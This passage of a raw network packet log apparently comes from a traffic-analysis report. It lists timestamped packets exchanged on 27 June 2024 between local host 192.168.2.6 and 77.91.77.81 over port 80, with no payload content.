                                                                Jun 27, 2024 05:59:06.295062065 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.295376062 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.295418978 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.295455933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.295469999 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.295497894 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.295521975 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.295547009 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.295561075 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.295587063 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.295608997 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.295676947 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.295691013 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.295717955 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.295741081 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306021929 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306065083 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306081057 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306104898 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306133032 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306201935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306216955 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306231022 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306252003 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306258917 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306278944 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306305885 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306504965 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306519032 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306533098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306546926 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306556940 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306566954 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306580067 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306596994 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306606054 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306624889 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306632042 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306643963 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306660891 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306879997 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306894064 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306915045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306926012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306938887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306947947 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306961060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.306971073 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306983948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.306992054 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307003021 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307014942 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307029963 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307037115 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307050943 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307059050 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307074070 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307090044 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307131052 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307132006 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307132006 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307132006 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307463884 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307478905 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307492018 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307506084 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307517052 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307535887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307543039 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307562113 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307588100 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307728052 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307742119 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307754993 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307774067 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307804108 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307878971 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307893038 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307907104 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307919979 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307930946 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307944059 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307951927 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307966948 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.307976007 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.307987928 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308001995 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308011055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308024883 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308033943 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308047056 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308056116 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308068991 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308079004 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308094025 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308099985 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308110952 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308123112 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308136940 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308159113 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308665037 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308680058 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308692932 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308707952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308718920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308733940 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308759928 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308845997 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308859110 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308872938 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308890104 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308897018 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308912039 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308918953 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308932066 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308940887 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308953047 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308970928 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308976889 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.308990002 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.308999062 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309010983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309024096 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309034109 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309046984 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309057951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309071064 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309079885 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309096098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309103012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309115887 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309134960 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309653997 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309668064 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309681892 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309695959 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309705973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309716940 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309729099 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309751034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309762001 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309772968 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309784889 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309798956 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309808969 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309820890 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309830904 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309844971 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309854031 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309870005 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309875965 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309889078 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309899092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309907913 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309921026 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309938908 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309945107 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309957981 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309971094 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.309981108 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.309993029 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310013056 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.310031891 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.310571909 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310585976 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310600042 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310614109 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310627937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310635090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310646057 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.310658932 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310672045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.310682058 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.310709000 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.362615108 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.362658024 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.362672091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.362696886 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.362726927 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.362735033 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.362750053 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.362763882 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.362773895 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.362787962 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.362807989 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.362834930 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.362898111 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.362937927 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388004065 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388020039 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388035059 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388087034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388123035 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388154030 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388201952 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388294935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388309956 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388331890 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388345003 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388360023 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388380051 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388442039 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388489962 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388849974 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388864040 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388878107 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.388900042 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.388923883 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.389005899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.389019966 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.389045954 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.389072895 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.389206886 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.389224052 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.389251947 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.389269114 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.399429083 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399478912 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.399602890 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399633884 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399650097 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399662971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.399673939 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.399687052 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399697065 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.399724960 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.399774075 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399789095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399833918 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.399970055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399985075 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.399998903 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400013924 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400034904 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400048971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400072098 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400136948 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400151968 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400165081 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400183916 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400191069 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400198936 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400227070 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400301933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400316954 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400331020 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400347948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400369883 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400382996 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400654078 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400669098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400681973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400701046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400707960 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400717020 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400728941 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400738955 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400752068 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.400765896 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.400791883 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401010990 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401022911 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401037931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401055098 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401078939 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401153088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401168108 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401182890 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401196957 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401226044 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401446104 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401459932 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401473045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401487112 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401496887 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401514053 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401524067 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401549101 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401572943 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401590109 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401611090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401626110 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401634932 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401652098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401658058 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401673079 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401686907 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401913881 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401928902 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401942968 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401961088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.401968002 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.401978016 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402005911 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402070999 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402117968 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402241945 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402256012 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402270079 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402285099 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402293921 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402307034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402316093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402334929 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402340889 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402353048 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402363062 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402374983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402384996 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402400970 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402406931 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402421951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402431011 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402441025 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402451992 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402472973 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402487040 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.402951002 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.402997971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403094053 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403109074 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403124094 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403136015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403147936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403156996 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403171062 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403178930 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403189898 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403201103 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403219938 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403234959 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403242111 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403254986 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403268099 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403276920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403294086 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403301001 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403314114 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.403321981 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.403332949 CEST4972980192.168.2.677.91.77.81
